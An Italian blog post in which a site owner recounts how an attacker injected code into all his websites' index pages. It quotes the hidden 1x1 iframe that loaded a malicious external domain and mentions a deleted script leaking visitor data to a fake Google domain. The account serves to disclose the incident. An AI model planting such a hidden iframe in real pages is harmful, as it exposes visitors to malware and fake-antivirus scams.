Praticamente, probabilmente sfruttando le debolezze dell’hosting oppure utilizzando le mie credenziali di accesso via FTP (cosa che mi sembra molto improbabile), è riuscito a modificare tutte le pagine index (sia html che php) di tutti i miei siti web inserendo il seguente iframe:

<iframe src=”http://thedeadpit.com/?click=xxxxxx” width=1 height=1 style=”visibility:hidden position:absolute”>

e un codice che ora ho cancellato che si collegava a google-stats.com e forniva (probabilmente) tutte le informazioni dei visitatori ai miei siti, ma che non ha nulla a che fare con google! Infatti se provate a collegarvi a quel sito si vieni subito dirottati a Google.it! Incredibile!

L’iframe invece chiudeva il browser e generava un messaggio di errore nel quale si consigliava di istallare un antivirus (pensa un po’ che bell’antivirus poteva essere) cliccando su OK. Mi hanno segnalato che Avast Antivirus lo segnalava come Trojan, ma per noi che utilizziamo linux non abbiamo questo problema! :-)

Morale: ho dovuto controllare e modificare i file index.php (anche quelli che finivano con index es. BoardIndex.php) di tutti i miei siti web, e modificare anche le credenziali di accesso! Non so dire con esattezza quale possa essere stata la causa di questo problema; il supporto del mio hosting servage mi risponde così:

Our servers are secured. Most of attackers use an upload script that allows visitors of the website to upload files. Please change your account password and check that no folders have insecure permissions such as 777 (unlimited access).

Però le cartelle dei siti web avevano i permessi 755, il che significa che solo il proprietario ha i permessi di scrittura, per questo ho supposto che l’hacker ha probabilmente sfruttato le debolezze del server o ha “sgamato” la mia user e pass dell’FTP… ma non ci credo a quest’ultima ipotesi ;-)